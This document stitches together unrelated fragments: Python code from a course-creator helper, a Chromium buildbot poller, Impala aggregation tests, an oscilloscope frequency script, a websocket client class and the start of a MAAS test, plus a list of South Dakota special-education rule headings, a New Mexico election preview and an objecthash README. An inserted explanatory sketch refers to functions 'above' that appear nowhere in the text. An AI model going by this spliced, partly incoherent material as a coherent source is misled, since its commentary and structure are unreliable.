add_user_with_status_unrequested(user)
course_creator_status = get_course_creator_status(user)
else:
course_creator_status = 'granted'
return course_creator_status
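The collision-avoiding integer-id pattern used by `assign_id` and `assign_group_ids` above can be sketched as follows. This is an illustration only: `generate_int_id` here is a hypothetical stand-in for the real helper imported elsewhere in the codebase, and the bounds mirror the `MINIMUM_GROUP_ID`/`MYSQL_MAX_INT` constants by name.

```python
import random

MINIMUM_GROUP_ID = 100
MYSQL_MAX_INT = 2147483647

def generate_int_id(minimum, maximum, used_ids):
    # Draw random candidates until one is not already taken.
    while True:
        candidate = random.randint(minimum, maximum)
        if candidate not in used_ids:
            return candidate

def assign_group_ids(groups, used_ids):
    # Give every group lacking an 'id' a fresh unique integer,
    # recording each assignment so later groups cannot collide.
    used = set(used_ids)
    for group in groups:
        if group.get("id") is None:
            group["id"] = generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, used)
        used.add(group["id"])
    return groups
```

As in the original, ids already present on a group are left untouched; only missing ids are generated.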
|
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import multiprocessing
import sys
import time
import traceback
import buildbot
POLL_INTERVAL = 600
BUILD_HISTORY_COUNT = 200
BUILD_RESULTS_COUNT = 50
def FetchLatestBuildResults(builder):
try:
builder.FetchRecentBuilds(BUILD_HISTORY_COUNT)
print 'Fetching results for', builder
for build in builder.LastBuilds(BUILD_RESULTS_COUNT):
for step in build.steps.itervalues():
step.results # pylint: disable=pointless-statement
except: # multiprocessing doesn't give useful stack traces, so print it here.
traceback.print_exc(file=sys.stderr)
print
raise
def main():
logging.getLogger().setLevel(logging.INFO)
builders = buildbot.Builders('chromium.perf')
process_pool = multiprocessing.Pool(4)
while True:
print 'Refreshing...'
buildbot.Update('chromium.perf', builders)
process_pool.map(FetchLatestBuildResults, builders.itervalues())
print 'Refreshed!'
time.sleep(POLL_INTERVAL)
if __name__ == '__main__':
main()
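The refresh loop in `main()` fans each builder's fetch out across a worker pool. A minimal sketch of one such refresh cycle, using a thread pool as a stand-in for the script's `multiprocessing.Pool` (the builder names and `fetch_latest` body are made up for illustration):

```python
from multiprocessing.pool import ThreadPool

def fetch_latest(builder):
    # Stand-in for FetchLatestBuildResults: do per-builder work, return a result.
    return builder.upper()

def poll_once(builders, pool):
    # One refresh cycle of the main() loop: map the fetch across the pool,
    # as process_pool.map(FetchLatestBuildResults, ...) does above.
    return pool.map(fetch_latest, builders)

pool = ThreadPool(4)
results = poll_once(["linux", "mac", "win"], pool)
pool.close()
pool.join()
```

`Pool.map` blocks until every item is done and returns results in input order, which is why the script can print "Refreshed!" immediately after the call.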
|
24:05:30:01 General responsibility of school district.
24:05:30:02 Opportunity to examine records.
24:05:30:02.01 Parent participation in meetings.
24:05:30:06.01 Procedural safeguards notice -- Availability.
24:05:30:06.02 Procedural safeguards notice -- Contents.
24:05:30:07.01 Filing a due process complaint.
24:05:30:07.02 Timeline for filing a due process complaint.
24:05:30:08 Free or low-cost services to parent.
24:05:30:08.01 Due process complaint notice.
24:05:30:08.02 Content of due process complaint notice.
24:05:30:08.04 Decision on sufficiency of complaint.
24:05:30:08.05 Amendment to due process complaint.
24:05:30:08.06 District response to due process complaint.
24:05:30:08.07 Other party response to due process complaint.
24:05:30:08.09 Resolution meeting -- Participants.
24:05:30:08.10 Resolution meeting -- Purpose.
24:05:30:08.11 Resolution meeting -- Waive or mediate.
24:05:30:08.12 Resolution period -- General.
24:05:30:08.13 Dismissal of complaint or initiation of hearing.
24:05:30:08.14 Adjustments to 30-day resolution period.
24:05:30:09.01 Mediator -- Qualified and impartial.
24:05:30:09.02 Meeting to encourage mediation.
24:05:30:09.04 Impartial due process hearing.
24:05:30:09.05 Subject matter of due process hearings.
24:05:30:09.06 Timeline for requesting a due process hearing.
24:05:30:10.01 Decision of hearing officer.
24:05:30:11 Appeal of hearing decision -- Civil action.
24:05:30:12.01 Additional disclosure of information.
24:05:30:13 Time limit for and convenience of hearings.
24:05:30:14 Child's status during proceedings.
24:05:30:16.01 Transfer of parental rights.
|
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
# Validates all aggregate functions across all datatypes
#
import logging
import pytest
from tests.common.test_vector import *
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_exec_option_dimension
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.common.skip import SkipIfOldAggsJoins, SkipIfS3
from tests.util.test_file_parser import QueryTestSectionReader
agg_functions = ['sum', 'count', 'min', 'max', 'avg']
data_types = ['int', 'bool', 'double', 'bigint', 'tinyint',
'smallint', 'float', 'timestamp']
result_lut = {
# TODO: Add verification for other types
'sum-tinyint': 45000, 'avg-tinyint': 5, 'count-tinyint': 9000,
'min-tinyint': 1, 'max-tinyint': 9,
'sum-smallint': 495000, 'avg-smallint': 50, 'count-smallint': 9900,
'min-smallint': 1, 'max-smallint': 99,
'sum-int': 4995000, 'avg-int': 500, 'count-int': 9990,
'min-int': 1, 'max-int': 999,
'sum-bigint': 49950000, 'avg-bigint': 5000, 'count-bigint': 9990,
'min-bigint': 10, 'max-bigint': 9990,
}
class TestAggregation(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAggregation, cls).add_test_dimensions()
# Add two more dimensions
cls.TestMatrix.add_dimension(TestDimension('agg_func', *agg_functions))
cls.TestMatrix.add_dimension(TestDimension('data_type', *data_types))
cls.TestMatrix.add_constraint(lambda v: cls.is_valid_vector(v))
@classmethod
def is_valid_vector(cls, vector):
data_type, agg_func = vector.get_value('data_type'), vector.get_value('agg_func')
file_format = vector.get_value('table_format').file_format
if file_format not in ['parquet']: return False
if cls.exploration_strategy() == 'core':
# Reduce execution time when exploration strategy is 'core'
if vector.get_value('exec_option')['batch_size'] != 0: return False
# Avro doesn't have timestamp type
if file_format == 'avro' and data_type == 'timestamp':
return False
elif agg_func not in ['min', 'max', 'count'] and data_type == 'bool':
return False
elif agg_func == 'sum' and data_type == 'timestamp':
return False
return True
def test_aggregation(self, vector):
data_type, agg_func = (vector.get_value('data_type'), vector.get_value('agg_func'))
query = 'select %s(%s_col) from alltypesagg where day is not null' % (agg_func,
data_type)
result = self.execute_scalar(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
if 'int' in data_type:
assert result_lut['%s-%s' % (agg_func, data_type)] == int(result)
# AVG
if vector.get_value('data_type') == 'timestamp' and\
vector.get_value('agg_func') == 'avg':
return
query = 'select %s(DISTINCT(%s_col)) from alltypesagg where day is not null' % (
agg_func, data_type)
result = self.execute_scalar(query, vector.get_value('exec_option'))
class TestAggregationQueries(ImpalaTestSuite):
"""Run the aggregation test suite, with codegen enabled and disabled, to exercise our
non-codegen code"""
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAggregationQueries, cls).add_test_dimensions()
cls.TestMatrix.add_dimension(
create_exec_option_dimension(disable_codegen_options=[False, True]))
if cls.exploration_strategy() == 'core':
cls.TestMatrix.add_dimension(create_uncompressed_text_dimension(cls.get_workload()))
@SkipIfS3.insert
@pytest.mark.execute_serially
def test_non_codegen_tinyint_grouping(self, vector):
# Regression for IMPALA-901. The test includes an INSERT statement, so can only be run
# on INSERT-able formats - text only in this case, since the bug doesn't depend on the
# file format.
if vector.get_value('table_format').file_format == 'text' \
and vector.get_value('table_format').compression_codec == 'none':
self.run_test_case('QueryTest/aggregation_no_codegen_only', vector)
def test_aggregation(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail(reason="IMPALA-283 - select count(*) produces inconsistent results")
self.run_test_case('QueryTest/aggregation', vector)
def test_distinct(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("HBase returns columns in alphabetical order for select distinct *, "
"making result verification fail.")
self.run_test_case('QueryTest/distinct', vector)
def test_group_concat(self, vector):
"""group_concat distinct tests
Required to run directly in python because the order in which results will be
merged at the final, single-node aggregation step is non-deterministic (if the
first phase is running on multiple nodes). Need to pull the result apart and
compare the actual items)"""
exec_option = vector.get_value('exec_option')
table_format = vector.get_value('table_format')
# Test group_concat distinct with other aggregate function and groupings.
# expected result is the row: 2010,'1, 2, 3, 4','1-2-3-4','2|3|1|4',40,4
query = """select year, group_concat(distinct string_col),
group_concat(distinct string_col, '-'), group_concat(distinct string_col, '|'),
count(string_col), count(distinct string_col)
from alltypesagg where int_col < 5 and year = 2010 group by year"""
result = self.execute_query(query, exec_option, table_format=table_format)
row = (result.data)[0].split("\t")
assert(len(row) == 6)
assert(row[0] == '2010')
delimiter = [', ', '-', '|']
for i in range(1, 4):
assert(set(row[i].split(delimiter[i-1])) == set(['1', '2', '3', '4']))
assert(row[4] == '40')
assert(row[5] == '4')
# Test group_concat distinct with arrow delimiter, with multiple rows
query = """select day, group_concat(distinct string_col, "->")
from (select * from alltypesagg where id % 100 = day order by id limit 99999) a
group by day order by day"""
result = self.execute_query(query, exec_option, table_format=table_format)
string_col = []
string_col.append(set(['1','101','201','301','401','501','601','701','801','901']))
string_col.append(set(['2','102','202','302','402','502','602','702','802','902']))
string_col.append(set(['3','103','203','303','403','503','603','703','803','903']))
string_col.append(set(['4','104','204','304','404','504','604','704','804','904']))
string_col.append(set(['5','105','205','305','405','505','605','705','805','905']))
string_col.append(set(['6','106','206','306','406','506','606','706','806','906']))
string_col.append(set(['7','107','207','307','407','507','607','707','807','907']))
string_col.append(set(['8','108','208','308','408','508','608','708','808','908']))
string_col.append(set(['9','109','209','309','409','509','609','709','809','909']))
string_col.append(set(['10','110','210','310','410','510','610','710','810','910']))
assert(len(result.data) == 10)
for i in range(10):
row = (result.data)[i].split("\t")
assert(len(row) == 2)
assert(row[0] == str(i+1))
assert(set(row[1].split("->")) == string_col[i])
# Test group_concat distinct with merge node
query = """select group_concat(distinct string_col, ' ') from alltypesagg
where int_col < 10"""
result = self.execute_query(query, exec_option, table_format=table_format)
assert(set((result.data)[0].split(" ")) == set(['1','2','3','4','5','6','7','8','9']))
class TestTPCHAggregationQueries(ImpalaTestSuite):
# Uses the TPC-H dataset in order to have larger aggregations.
@classmethod
def get_workload(cls):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestTPCHAggregationQueries, cls).add_test_dimensions()
cls.TestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format in ['parquet'])
def test_tpch_aggregations(self, vector):
self.run_test_case('tpch-aggregations', vector)
@SkipIfOldAggsJoins.passthrough_preagg
def test_tpch_passthrough_aggregations(self, vector):
self.run_test_case('tpch-passthrough-aggregations', vector)
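The order-insensitive comparison that `test_group_concat` relies on (split the joined string on its delimiter, compare as sets) can be factored into a small helper. This is a sketch for illustration, not part of the actual suite:

```python
def group_concat_matches(actual, expected_items, delimiter=", "):
    # group_concat merges partial aggregates in a non-deterministic order,
    # so compare the delimiter-joined result as a set of items rather
    # than as a literal string.
    return set(actual.split(delimiter)) == set(expected_items)
```

For example, `"3, 1, 2"` matches `["1", "2", "3"]` regardless of the order in which the single-node aggregation merged the partial results.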
|
|
# -*- coding: utf-8 -*-
# Example by Colin O'Flynn
#
import math
import time
import inspect
import numpy as np
from picoscope import ps5000a
from matplotlib.mlab import find
class freqMeasure():
def __init__(self):
self.ps = ps5000a.PS5000a(connect=False)
def openScope(self):
self.ps.open()
self.ps.setChannel("A", coupling="DC", VRange=5.0, probeAttenuation=10)
self.ps.setChannel("B", enabled=False)
self.ps.setChannel("C", enabled=False)
self.ps.setChannel("D", enabled=False)
res = self.ps.setSamplingFrequency(1000E6, 50000)
self.sampleRate = res[0]
print "Sampling @ %f MHz, %d samples"%(res[0]/1E6, res[1])
#Use external trigger to mark when we sample
self.ps.setSimpleTrigger(trigSrc="External", threshold_V=0.150, timeout_ms=5000)
def closeScope(self):
self.ps.close()
def armMeasure(self):
self.ps.runBlock()
def freq_from_crossings(self, sig):
"""Estimate frequency by counting zero crossings"""
# From https://gist.github.com/endolith/255291:
fs = self.sampleRate
# Find all indices right before a rising-edge zero crossing
indices = find((sig[1:] >= 0) & (sig[:-1] < 0))
# More accurate, using linear interpolation to find intersample
# zero-crossings (Measures 1000.000129 Hz for 1000 Hz, for instance)
crossings = [i - sig[i] / (sig[i+1] - sig[i]) for i in indices]
# Some other interpolation based on neighboring points might be better. Spline, cubic, whatever
return fs / np.mean(np.diff(crossings))
def measure(self):
print "Waiting for trigger"
while not self.ps.isReady(): time.sleep(0.01)
print "Sampling Done"
data = self.ps.getDataV("A", 50000)
data = data - np.mean(data)
freq = self.freq_from_crossings(data)
print freq
if __name__ == "__main__":
fm = freqMeasure()
fm.openScope()
try:
while 1:
fm.armMeasure()
fm.measure()
except KeyboardInterrupt:
pass
fm.closeScope()
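The estimator above depends on `matplotlib.mlab.find`, which has since been removed from matplotlib. A self-contained NumPy version of the same technique, checked against a synthetic 1 kHz sine at the script's 1 MHz sample rate, might look like this:

```python
import numpy as np

def freq_from_crossings(sig, fs):
    # Indices right before a rising-edge zero crossing
    indices = np.nonzero((sig[1:] >= 0) & (sig[:-1] < 0))[0]
    # Linear interpolation to the exact inter-sample crossing points
    crossings = indices - sig[indices] / (sig[indices + 1] - sig[indices])
    # Mean period between crossings, converted to frequency
    return fs / np.mean(np.diff(crossings))

fs = 1_000_000  # 1 MHz, as configured in openScope()
t = np.arange(50000) / fs
estimate = freq_from_crossings(np.sin(2 * np.pi * 1000.0 * t), fs)
```

With 50 full cycles in the capture, the interpolated estimate lands within a small fraction of a hertz of the true 1000 Hz.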
|
Democrats control the 42-member New Mexico Senate, and Republicans control the 70-member New Mexico House of Representatives, which until 2014 had been under Democratic control for 50 years. Both parties hope to gain control of the other chamber on Nov. 8 with wins in a few key races.
Running for the senate seat of District 15 in Albuquerque’s mid-Northeast Heights are incumbent Daniel Ivey-Soto and challenger Eric Burton.
Democrat Ivey-Soto is a lawyer who has represented the district since 2013. He’s a former elections director in the office of secretary of state. He sponsored a transparency law requiring 72-hour notice of public meetings. He’s working on a bill to establish a Public Accountability Board, which would have enforcement and decision-making capability over state and local officials.
Republican Eric Burton is a lawyer who co-owns a trust company and several other small businesses. He worked as chief of staff for the Republican-controlled House Judiciary Committee. “I would put myself in the category of a free-market capitalist conservative who leans libertarian on social issues,” he told the Albuquerque Journal.
In District 29, Republican Gregory Baca and the Democratic incumbent, Michael Sanchez, are competing to represent a wide swath of Valencia County and a small portion of Bernalillo County that includes Belen, Tomé and Isleta Pueblo.
Baca is an attorney, Gulf War veteran and owner of a self-service car wash. Sanchez has been a Senate member since 1993 and the Democratic floor leader since 2004. Sanchez supports a code of ethics for elected and appointed officials similar to the existing legislators’ code, which is a legislative rule. “Despite recent scandals and headlines involving certain officials, I believe they are the exception, while most serve with integrity,” he said.
In House District 23, Republican incumbent Paul Pacheco is being challenged by Democrat Daymon Ely. The district comprises the portion of Albuquerque that runs along Coors Boulevard roughly from Montaño Road to Corrales.
Pacheco is a former police officer. He plans to archive and make legislative hearings available to the general public. He supported a bill last session that would create an independent ethics commission with the authority to hold public servants accountable for wrongdoing. He supports identifying accommodations within the state’s budget to fund early childhood development programs.
Ely is campaigning against over-testing children in schools and said he will seek pay increases for educators. He supports aggressive development of alternative energy and helping local businesses grow. He supports creating an independent ethics commission. “Given the history of corruption and ethical violations by some of our public officials, it is clear that we need a code of ethics in New Mexico,” he said.
The resignation and eventual conviction of Dianna Duran for fraud involving her own campaign funds led to a special election for her office. The governor appointed Albuquerque City Councilor Brad Winter to fill Duran’s unexpired term. Winter is not running.
Vying for the job are Republican Nora Espinoza and Democrat Maggie Toulouse Oliver. The secretary of state oversees statewide elections and the state’s database of corporations. The secretary of state is second in the line of succession behind the governor and the lieutenant governor.
Espinoza, a former teacher, is a Republican state representative from Roswell who currently represents a vast area that stretches from Roswell to Corona to Carrizozo. In 2013 Espinoza tried to ban books on Mexican-American studies from public schools. She seeks to change campaign finance reporting by clearly defining who must report and what has to be disclosed, including dark money participants.
“The SOS must follow the law – not attempt to create law. The SOS must ensure election integrity without favoring any one group over another,” she said.
Toulouse Oliver has been Bernalillo County Clerk since 2007. She narrowly lost to Duran in 2014; she seeks to change campaign finance reporting by writing rules that are easier for candidates to comply with, and to help the public understand relationships between candidates and donors.
Judith Nakamura and Michael Vigil are competing for a spot on the highest court in the state, which has jurisdiction over all lower courts.
Nakamura, who was appointed to a vacancy by Gov. Susana Martinez, is currently one of five Supreme Court justices. She previously was appointed by the governor to the Bernalillo County District Court. She’s a former Metropolitan Court chief judge who was honored by MADD as national judge of the year for combatting DWI. She seeks to improve resource availability and speed up the court process.
Vigil has been a judge of the New Mexico Court of Appeals for 13 years. He was twice recommended as qualified for the New Mexico Supreme Court by a bipartisan nominating commission. He was appellate counsel in over 50 precedent-setting cases as a practicing attorney for 27 years.
Patricia Paiz is running against Steven Michael Quezada for Bernalillo County Commissioner of District 2 to replace Art De La Cruz, who couldn’t run again due to term limits. The County Commission is in charge of the county government budget, ordinances and resolutions, as well as zoning and business regulation.
Paiz spent 20 years as a police officer. She’s a board member of Albuquerque Metropolitan Crime Stoppers. If elected, she plans to consolidate some departments, eliminate sprawl development and address the needs of Pajarito Mesa, an area of Bernalillo County with no running water or power.
Quezada has served as an APS Board Member and is a member of the Route 66 West Side Neighborhood Association. He said he will ensure that a voter-approved behavioral health tax is implemented prudently. He said he wants to protect the open space and farming of the South Valley. “We can never let another Pajarito Mesa happen in our community again,” he said.
Republican Kim Hillard and Democrat Nancy Bearce are competing for the scandal-plagued office of Bernalillo County Treasurer. The treasurer is responsible for collecting property taxes and investment of funds.
The office has been held for the last 12 years by either Manny Ortiz or Patrick Padilla, both of whom have been accused of mismanaging county investments.
Hillard has a background in data systems administration and personnel management, and said he plans to restore confidence in the office. “Audits of past years that were negative must be reviewed and changes implemented,” he said. Hillard said he would ensure a balanced investment portfolio and the hiring of a well-qualified investment officer.
“The County Commission and treasurer must agree on the hiring of the investment officer, which brokers can do business with the County and how much cash must be retained,” he said.
Nancy Bearce served as a manager in employee benefits for the state government and Albuquerque Public Schools. She plans to review all procedures, policies and recent internal audits to ensure compliance with investment guidelines.
Voters are being asked whether they want to amend the New Mexico Constitution to give judges the ability to hold accused criminals in jail without bond if they believe a suspect to be a danger to the public or pose a flight risk.
Additionally, the amendment states that defendants shall not be held in jail because of their inability to raise bail. Practically, that would mean that a judge, based on a defendant’s history, could release them on their own recognizance. Studies in states in which such changes to bail laws have been made show that defendants released on no-money bonds show up for court at the same rates as those who post money bonds.
The New Mexico Supreme Court, which supports the amendment, argues that it will reduce the cost of pre-trial incarceration and save money for the state’s 33 counties, which operate the state’s local jails.
Sara MacNeil, a former reporter for the Daily Lobo, is an ABQ Free Press Weekly editorial intern.
|
import asyncio
import json
import logging
import signal
from typing import Callable, List, Optional
import websockets
from .dumpling import Dumpling
from .exceptions import InvalidDumpling
from ._shared import ND_CLOSE_MSGS, HUB_HOST, HUB_OUT_PORT
class DumplingEater:
"""
Base helper class for Python-based dumpling eaters.
Connects to ``nd-hub`` and listens for any dumplings made by the provided
``chef_filter`` (or all chefs if ``chef_filter`` is ``None``). Can be
given ``async`` callables for any of the following events:
``on_connect(websocket_uri, websocket_obj)``
invoked when the connection to ``nd-hub`` is made
``on_dumpling(dumpling)``
invoked whenever a dumpling is emitted from ``nd-hub``
``on_connection_lost(e)``
invoked when the connection to ``nd-hub`` is closed
**The above callables must be** ``async def`` **methods**.
:param name: Name of the dumpling eater. Is ideally unique per eater.
:param hub: Address where ``nd-hub`` is sending dumplings from.
:param chef_filter: List of chef names whose dumplings this eater wants to
receive. ``None`` means get all chefs' dumplings.
:param on_connect: Called when connection to ``nd-hub`` is made. Is passed
two parameters: the ``nd-hub`` websocket URI (string) and websocket
object (:class:`websockets.client.WebSocketClientProtocol`).
    :param on_dumpling: Called whenever a dumpling is received. Is passed the
        dumpling as a :class:`Dumpling` instance.
:param on_connection_lost: Called when connection to ``nd-hub`` is lost. Is
passed the associated exception object.
"""
def __init__(
self,
name: str = 'nameless_eater',
            hub: str = '{}:{}'.format(HUB_HOST, HUB_OUT_PORT),
*,
chef_filter: Optional[List[str]] = None,
on_connect: Optional[Callable] = None,
on_dumpling: Optional[Callable] = None,
on_connection_lost: Optional[Callable] = None) -> None:
self.name = name
self.chef_filter = chef_filter
self.hub = hub
self.hub_ws = "ws://{0}".format(hub)
# Configure handlers. If we're not provided with handlers then we
# fall back on the default handlers or the handlers provided by a
# subclass.
self.on_connect = (
on_connect if on_connect is not None else self.on_connect
)
self.on_dumpling = (
on_dumpling if on_dumpling is not None else self.on_dumpling
)
self.on_connection_lost = (
on_connection_lost if on_connection_lost is not None
else self.on_connection_lost
)
self._was_connected = False
self._logger_name = "{}.{}".format(__name__, self.name)
self.logger = logging.getLogger(self._logger_name)
def __repr__(self):
def handler_string(attr):
# We can't use 'repr(self.handler)' for callables because it causes
# an infinite loop as the repr of the handler includes the repr of
# the handler (etc). So we replace handler reprs with
# '<callable: name>'.
return (
'<callable: {}>'.format(attr.__name__) if callable(attr)
else repr(attr)
)
return (
'{}('
'name={}, '
'hub={}, '
'chef_filter={}, '
'on_connect={}, '
'on_dumpling={}, '
'on_connection_lost={})'.format(
type(self).__name__,
repr(self.name),
repr(self.hub),
repr(self.chef_filter),
handler_string(self.on_connect),
handler_string(self.on_dumpling),
handler_string(self.on_connection_lost),
)
)
async def _grab_dumplings(self, dumpling_count=None):
"""
Receives all dumplings from the hub and looks for any dumplings which
were created by the chef(s) we're interested in. All those dumplings
are then passed to the on_dumpling handler (after being converted from
their JSON form back into a Dumpling instance).
:param dumpling_count: Number of dumplings to eat. ``None`` means eat
forever.
"""
dumplings_eaten = 0
websocket = await websockets.client.connect(self.hub_ws)
self._was_connected = True
self.logger.info("{0}: Connected to dumpling hub at {1}".format(
self.name, self.hub_ws))
try:
# Announce ourselves to the dumpling hub.
await websocket.send(json.dumps({'eater_name': self.name}))
if self.on_connect:
await self.on_connect(self.hub_ws, websocket)
while True:
# Eat a single dumpling.
dumpling_json = await websocket.recv()
# Create a Dumpling from the JSON received over the websocket.
# Note that invalid dumplings will probably be stripped out by
# the hub already.
try:
dumpling = Dumpling.from_json(dumpling_json)
except InvalidDumpling as e:
self.logger.error("{0}: Invalid dumpling: {1}".format(
self.name, e))
continue
self.logger.debug("{0}: Received dumpling from {1}".format(
self.name, dumpling.chef_name))
# Call the on_dumpling handler if this dumpling is from a
# chef that we've registered interest in.
if (self.chef_filter is None or
dumpling.chef_name in self.chef_filter):
self.logger.debug(
"{0}: Calling dumpling handler {1}".format(
self.name, self.on_dumpling))
dumplings_eaten += 1
await self.on_dumpling(dumpling)
# Stop eating dumplings if we've reached our threshold.
if dumpling_count is not None and \
dumplings_eaten >= dumpling_count:
await websocket.close(*ND_CLOSE_MSGS['eater_full'])
break
except asyncio.CancelledError:
self.logger.warning(
f"\n{self.name}: Connection to dumpling hub cancelled; "
f"closing..."
)
try:
await websocket.close(*ND_CLOSE_MSGS['conn_cancelled'])
except websockets.exceptions.InvalidState:
pass
except websockets.exceptions.ConnectionClosed as e:
self.logger.warning(
"{}: Lost connection to dumpling hub: {}".format(self.name, e)
)
if self.on_connection_lost:
await self.on_connection_lost(e)
@staticmethod
def _interrupt_handler():
"""
Signal handler. Cancels all running async tasks.
"""
        # asyncio.Task.all_tasks() was deprecated in 3.7 and removed in 3.9.
        tasks = asyncio.all_tasks()
for task in tasks:
task.cancel()
def run(self, dumpling_count=None):
"""
Run the dumpling eater.
This will block until the desired ``dumpling_count`` is met.
:param dumpling_count: Number of dumplings to eat. ``None`` means eat
forever.
"""
self.logger.info("{0}: Running dumpling eater".format(self.name))
if not callable(self.on_dumpling):
self.logger.error(
"{0}: on_dumpling handler is not callable".format(self.name))
return
self.logger.debug("{0}: Looking for dumpling hub at {1}".format(
self.name, self.hub_ws))
self.logger.debug("{0}: Chefs: {1}".format(
self.name,
", ".join(self.chef_filter) if self.chef_filter else 'all')
)
try:
asyncio.run(self._grab_dumplings(dumpling_count))
except OSError as e:
self.logger.warning(
"{0}: There was a problem with the dumpling hub connection. "
"Is nd-hub available?".format(self.name))
self.logger.warning("{0}: {1}".format(self.name, e))
finally:
if self._was_connected:
self.logger.warning(
"{0}: Done eating dumplings.".format(self.name))
async def on_connect(self, websocket_uri, websocket_obj):
"""
Default on_connect handler.
This will be used if an ``on_connect`` handler is not provided during
instantiation, and if a handler is not provided by a DumplingEater
subclass.
        Only logs a warning-level log entry.
"""
self.logger.warning(
'{}: No on_connect handler specified; ignoring '
'connection.'.format(self.name)
)
async def on_dumpling(self, dumpling):
"""
Default on_dumpling handler.
This will be used if an ``on_dumpling`` handler is not provided during
instantiation, and if a handler is not provided by a DumplingEater
subclass.
        Only logs a warning-level log entry.
"""
self.logger.warning(
'{}: No on_dumpling handler specified; ignoring '
'dumpling.'.format(self.name)
)
async def on_connection_lost(self, e):
"""
Default on_connection_lost handler.
This will be used if an ``on_connection_lost`` handler is not provided
during instantiation, and if a handler is not provided by a
DumplingEater subclass.
        Only logs a warning-level log entry.
"""
self.logger.warning(
'{}: No on_connection_lost handler specified; ignoring '
'connection loss.'.format(self.name)
)
|
GitHub - benlaurie/objecthash: A way to cryptographically hash objects (in the JSON-ish sense) that works cross-language. And, therefore, cross-encoding.
A way to cryptographically hash objects (in the JSON-ish sense) that works cross-language. And, therefore, cross-encoding.
You only need to run `make get` the first time.
Take a look at objecthash_test.*.
Now you can sign objects regardless of the transport encoding and programming language used.
Most object signing/verifying schemes (e.g. X509v3, JOSE) work by signing or verifying some canonical binary or text form of the object, which you then decode and hope you end up with what was actually signed. Using objecthash you decode first, then verify. If verification works, then the object you have is the object that was signed in the first place.
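The decode-first idea can be sketched as follows. This toy hash is NOT the real objecthash algorithm (the actual type tags and normalization rules differ); it only illustrates hashing the decoded object rather than its serialized bytes, so two byte-for-byte different encodings of the same object yield the same digest:

```python
import hashlib
import json

def toy_objecthash(obj):
    """Toy content hash over a decoded JSON-ish object (illustrative only)."""
    h = hashlib.sha256()
    if isinstance(obj, dict):
        # Sort the per-pair digests so dict/key order is irrelevant.
        pairs = sorted(toy_objecthash(k) + toy_objecthash(v)
                       for k, v in obj.items())
        h.update(b'd' + b''.join(pairs))
    elif isinstance(obj, list):
        h.update(b'l' + b''.join(toy_objecthash(x) for x in obj))
    elif isinstance(obj, bool):  # must precede the int check
        h.update(b'b' + (b'1' if obj else b'0'))
    elif isinstance(obj, (int, float)):
        # Normalize ints to floats so 1 and 1.0 hash identically.
        h.update(b'f' + repr(float(obj)).encode())
    elif isinstance(obj, str):
        h.update(b'u' + obj.encode('utf-8'))
    elif obj is None:
        h.update(b'n')
    return h.digest()

# Two different encodings of the same object:
a = json.loads('{"x": 1, "y": [true, "z"]}')
b = json.loads('{ "y":[true,"z"],   "x": 1.0 }')
assert toy_objecthash(a) == toy_objecthash(b)
```

With a scheme like this, you sign `toy_objecthash(decoded_object)`: the verifier decodes first and then hashes, so whitespace, key order, and encoding details can no longer change what was signed.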
If your data is guessable, then redaction doesn't really help: the data can easily be reconstructed with a brute force attack. So, objecthash offers a way to decorate an object so that everything in it can be redacted and be safe from brute-forcing. redactable(o) turns every basic object (except keys) in o into an array with two entries, the first being a 32 byte random string. Since keys are required to be strings, those are prefixed with the random string.
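The decoration can be sketched like this (a minimal illustration; the real library's output format and nonce encoding may differ): every leaf value becomes a `[nonce, value]` pair and every key gets a nonce prefix, so a brute-force attacker must also guess 32 random bytes per field:

```python
import os

def redactable(obj):
    """Decorate obj so any value can be redacted without being guessable.

    Each basic value becomes [32-byte-random-hex, value]; dict keys, which
    must remain strings, are prefixed with the random string instead.
    (Illustrative sketch -- field formats differ from the real library.)
    """
    if isinstance(obj, dict):
        return {os.urandom(32).hex() + k: redactable(v)
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [redactable(x) for x in obj]
    # Basic value: pair it with a fresh random nonce.
    return [os.urandom(32).hex(), obj]

decorated = redactable({"ssn": "123-45-6789"})
```

To redact a field you would then replace its `[nonce, value]` pair with its hash; without the nonce, the original value cannot be recovered by enumeration.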
Python distinguishes between int and float when parsing JSON, which makes it incompatible with GO - all numbers are float in Go. Common JSON functions convert Python JSON to Common JSON first.
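That normalization can be sketched as a recursive int-to-float walk (`commonize` is a hypothetical name; the library's actual Common JSON functions may differ):

```python
def commonize(obj):
    """Recursively convert ints to floats so Python-parsed JSON matches Go,
    where encoding/json parses every JSON number as float64."""
    if isinstance(obj, bool):
        return obj  # bool is an int subclass; leave it untouched
    if isinstance(obj, int):
        return float(obj)
    if isinstance(obj, list):
        return [commonize(x) for x in obj]
    if isinstance(obj, dict):
        return {k: commonize(v) for k, v in obj.items()}
    return obj

assert commonize({"n": 1, "ok": True}) == {"n": 1.0, "ok": True}
```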
|
# Copyright 2018 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Test the configauth command."""
from contextlib import contextmanager
from datetime import datetime, timedelta
import json
import tempfile
import unittest
from django.contrib.sessions.models import Session
from django.core.management import call_command
from django.core.management.base import CommandError
from maasserver.management.commands import configauth
from maasserver.models import Config
from maasserver.models.rbacsync import RBAC_ACTION, RBACLastSync, RBACSync
from maasserver.rbac import FakeRBACUserClient
from maasserver.testing.testcase import MAASServerTestCase
class TestConfigAuthCommand(MAASServerTestCase):
def setUp(self):
super().setUp()
self.read_input = self.patch(configauth, "read_input")
self.read_input.return_value = ""
self.mock_print = self.patch(configauth, "print")
self.rbac_user_client = FakeRBACUserClient()
mock_client = self.patch(configauth, "RBACUserClient")
mock_client.return_value = self.rbac_user_client
@contextmanager
def agent_file(self):
with tempfile.NamedTemporaryFile(mode="w+") as agent_file:
config = {
"key": {"public": "public-key", "private": "private-key"},
